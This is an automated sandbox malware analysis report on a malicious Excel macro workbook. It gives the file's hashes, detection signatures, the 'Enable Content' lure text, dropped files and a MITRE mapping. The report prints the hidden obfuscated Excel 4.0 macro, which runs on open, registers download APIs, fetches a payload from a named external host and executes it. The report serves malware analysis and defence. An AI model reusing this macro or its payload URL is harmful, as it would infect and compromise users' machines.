
Analysis Report Document_280325456.xlsm

Overview

General Information

Sample Name:Document_280325456.xlsm
Analysis ID:336351
MD5:c1bf94e62e9006b88957ff148ea99a4a
SHA1:96b65855460b4ef922a53527fb07a31c87f0743c
SHA256:4f753f04450557e02847d44c31b1f498b41a7eb7cb4cd60cd8c8d60a3e38f3a6

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Excel document contains an embedded macro which executes code when the document is opened

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 648 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: Document_280325456.xlsm | Virustotal: Detection: 11%

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37E9613F.png

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing 1 11 12 1 from the yellow bar above 13 14 1 @Once You have Enable Editing, please
Source: Screenshot number: 4 | Screenshot OCR: Enable Content 15 1 from the yellow bar above 16 CI 17 I " I WHY I CANNOTOPEN THIS DOCUMENT? 19
Source: Document image extraction number: 2 | Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 2 | Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 8 | Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
Source: Document image extraction number: 8 | Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? wYou are using IDS or Andr
Found Excel 4.0 Macro with suspicious formulas
Source: Document_280325456.xlsm | Initial sample: EXEC
Source: workbook.xml | Binary string: " defaultThemeVersion="124226"/><bookViews><workbookView xWindow="240" yWindow="105" windowWidth="14805" windowHeight="8010"/></bookViews><sheets><sheet name="DocuSign" sheetId="7" r:id="rId1"/><sheet name="Sheet" sheetId="4" state="hidden" r:id="rId2"/><sheet name="Biola" sheetId="8" state="hidden" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet!$A$100</definedName></definedNames><calcPr calcId="144525"/></workbook>
Source: classification engine | Classification label: mal64.expl.evad.winXLSM@1/9@0/0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Document_280325456.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD95D.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: Document_280325456.xlsm | Virustotal: Detection: 11%
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: Document_280325456.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Document_280325456.xlsm | Initial sample: OLE zip file path = xl/media/image1.png
Source: Document_280325456.xlsm | Initial sample: OLE zip file path = xl/media/image3.png
Source: Document_280325456.xlsm | Initial sample: OLE zip file path = xl/media/image2.png
Source: Document_280325456.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: Document_280325456.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: Document_280325456.xlsm | Initial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting11 | Path Interception | Path Interception | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting11 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
Document_280325456.xlsm | 12% | Virustotal | |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP info

General Information

Joe Sandbox Version:31.0.0 Red Diamond
Analysis ID:336351
Start date:05.01.2021
Start time:21:15:02
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 11s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Document_280325456.xlsm
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal64.expl.evad.winXLSM@1/9@0/0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37E9613F.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):8301
Entropy (8bit):7.970711494690041
Encrypted:false
SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
MD5:D8574C9CC4123EF67C8B600850BE52EE
SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
Malicious:false
Reputation:moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\52C00A34.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):557
Entropy (8bit):7.343009301479381
Encrypted:false
SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
MD5:A516B6CB784827C6BDE58BC9D341C1BD
SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
Malicious:false
Reputation:moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B6E53CA5.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):848
Entropy (8bit):7.595467031611744
Encrypted:false
SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
MD5:02DB1068B56D3FD907241C2F3240F849
SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
Malicious:false
Reputation:moderate, very likely benign file
C:\Users\user\AppData\Local\Temp\9FDE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):26157
Entropy (8bit):7.557610528482013
Encrypted:false
SSDEEP:768:1nnlABP+wARgLfJ9gGOm7lVW+u7qk8nN8ZUq:Bnl0WwWgngGdefcKZt
MD5:A37098191951CA041AA34B0C0075B023
SHA1:AFAD14C7B12EEA825097FAFBA7A619BD8CAECFB4
SHA-256:16E00334E893B2E5D1C965A0BF64D64097A459BCFFC8CAAC8C3C703E960E9C00
SHA-512:97BFDDEC9D3A90BCD7E152059BB44D39008E0BDB59299821EB880921BE5C8BA46B69F00959843885AC65FB5D55EEF21A574A78335ACE2C35605FBA931E3D97AE
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 6 04:15:42 2021, atime=Wed Jan 6 04:15:42 2021, length=12288, window=hide
Category:dropped
Size (bytes):867
Entropy (8bit):4.485963974010465
Encrypted:false
SSDEEP:12:85QICLgXg/XAlCPCHaXtB8XzB/gUaX+Wnicvb7jLbDtZ3YilMMEpxRljK8CTdJP8:857U/XTd6j25YefbDv3q+rNru/
MD5:25BD30BB83124FF36C7DAFD697E1DB3C
SHA1:81631A5F31DF3551239DF71D3174000915A2BFC7
SHA-256:1AC7FC4228EADF03B364F436F94B88FCF5A1E1E376129CF928E0CF0C97E525CA
SHA-512:EE5FDADC3457A2FBC408895582ECD7348FDEC536B4483C319B8C10BAF8BC12E50BEBFEB45A5BA07E05F5DEAC5B42919B90A08EECD7EC4DBF750CD9FE99C26AE1
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Document_280325456.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Jan 6 04:15:42 2021, atime=Wed Jan 6 04:15:42 2021, length=26157, window=hide
Category:dropped
Size (bytes):2118
Entropy (8bit):4.542343333365082
Encrypted:false
SSDEEP:48:8Fm/XT0jFvMG5WCB+Z+Qh2Fm/XT0jFvMG5WCB+Z+Q/:8Fm/XojFL5js+Qh2Fm/XojFL5js+Q/
MD5:B666F7E5E296D535C2FE455C644BEEA8
SHA1:C5A2BDE8E84CA4B65CF409C0AEBA21FADE436654
SHA-256:8D74810AA5F0EFA9B5F115B8EBCA9330653666E22651603ACC4FDAE926A41B42
SHA-512:C8BDDD336EBB8507024A6F0B31C49F2C869646BAB25FAB24F4EF70E992F0DF67283DEF45BF618F0696A7A6F9684AE18A351802270AB01507C63D9EF385200A27
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):109
Entropy (8bit):4.741129595988925
Encrypted:false
SSDEEP:3:oyBVomxWqdsIyjo5S/IyjomxWqdsIyjov:dj/h0ySQ0/h0y
MD5:E7CBB7A6C94239A6230A55D1CCBCCCDE
SHA1:7827FAA76A624DA91B86731EABD82B301E5DB65E
SHA-256:6138F50323CC704F93184A93584CDC09555BE6B32A388FFFF975BBC365B6FF57
SHA-512:5A82957358F3EFE6C7395FB1858CCB80DA4A63C92790E1E41B7D86A2F01D8BE5C0D136515DB8F50CE4AE4B920555ACF0EF7173DFC6C58516899FAFCBCD61EA2D
Malicious:false
Reputation:low
Preview: Desktop.LNK=0..[misc]..Document_280325456.LNK=0..Document_280325456.LNK=0..[misc]..Document_280325456.LNK=0..
C:\Users\user\Desktop\20EE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):26157
Entropy (8bit):7.557610528482013
Encrypted:false
SSDEEP:768:1nnlABP+wARgLfJ9gGOm7lVW+u7qk8nN8ZUq:Bnl0WwWgngGdefcKZt
MD5:A37098191951CA041AA34B0C0075B023
SHA1:AFAD14C7B12EEA825097FAFBA7A619BD8CAECFB4
SHA-256:16E00334E893B2E5D1C965A0BF64D64097A459BCFFC8CAAC8C3C703E960E9C00
SHA-512:97BFDDEC9D3A90BCD7E152059BB44D39008E0BDB59299821EB880921BE5C8BA46B69F00959843885AC65FB5D55EEF21A574A78335ACE2C35605FBA931E3D97AE
Malicious:false
Reputation:low
C:\Users\user\Desktop\~$Document_280325456.xlsm
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):330
Entropy (8bit):1.4377382811115937
Encrypted:false
SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:96114D75E30EBD26B572C1FC83D1D02E
SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:true
Reputation:moderate, very likely benign file
Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:Microsoft Excel 2007+
Entropy (8bit):7.5570229813719845
TrID:
  • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
  • ZIP compressed archive (8000/1) 16.67%
File name:Document_280325456.xlsm
File size:26232
MD5:c1bf94e62e9006b88957ff148ea99a4a
SHA1:96b65855460b4ef922a53527fb07a31c87f0743c
SHA256:4f753f04450557e02847d44c31b1f498b41a7eb7cb4cd60cd8c8d60a3e38f3a6
SHA512:74bc623ab19eb585790edb7093d028bf68eb9de99736b507ab3cabb0e83b09dcb12453b1bed2c0804835094012d908a6b5f42a69ba55494b04fe51bd561975e4
SSDEEP:768:AIflDaGcMARgtf+9jZOm7lsfW+u7DetR8g:fflD0MWw4jZd1fgRP

File Icon

Icon Hash:e4e2aa8aa4bcbcac

Static OLE Info

General

Document Type:OpenXML
Number of OLE Files:1

OLE File "Document_280325456.xlsm"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

,,,,,,,,,,,,,,,,,,"=EXEC(AS41071&"" ""&AQ4875&HG9961)"=B100(),"=FORMULA.FILL(Biola!Q43&Biola!Q44&Biola!Q45&Biola!Q46&Biola!Q47&Biola!Q48,BB53)","=FORMULA.FILL(""INSENG"",HI18807)",=RETURN(A112),=B102(),=C102(),,"=FORMULA.FILL(Biola!R42&Biola!R43&Biola!R44&Biola!R45&Biola!R46&Biola!R47&Biola!R48&Biola!R49&Biola!R50&Biola!R51&Biola!R52&Biola!R53&Biola!R54&Biola!R55&Biola!R56&Biola!R57&Biola!R58&Biola!R59,HZ48004)","=FORMULA.FILL(Biola!E50,AN32726)",,=B104(),=C104(),"=REGISTER(BB53,HZ48004,HI18898,IK4106,,1,9)","=FORMULA.FILL(Biola!Q51&Biola!Q52&Biola!Q53&Biola!Q54&Biola!Q55&Biola!Q56,HI18898)","=FORMULA.FILL(""BCCJ"",IK16309)","=Niokaser(0,GT17028,AQ4875,0,0)",=B106(),=C106(),,"=FORMULA.FILL(Biola!H42&B115,GT17028)","=FORMULA.FILL(""Niokaser"",IK4106)","=REGISTER(HI18807,AN32726,IK16309,DI7875,,1,9)",=B108(),=C108(),"=Vuolasd(GT17028,AQ4875,1)","=FORMULA.FILL(Biola!H43,AQ4875)","=FORMULA.FILL(""Vuolasd"",DI7875)",,"=FORMULA.FILL(Biola!H52,AS41071)",=A104(),,=B111(),,=RUN(D99),"=FORMULA.FILL(Biola!H53,HG9961)",,,=C100(),,=HALT(),,,,,,,hiperdoscolchoes.com/demoimg.gif,,

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

System Behavior

General

Start time:21:15:40
Start date:05/01/2021
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:0x13fd70000
File size:27641504 bytes
MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
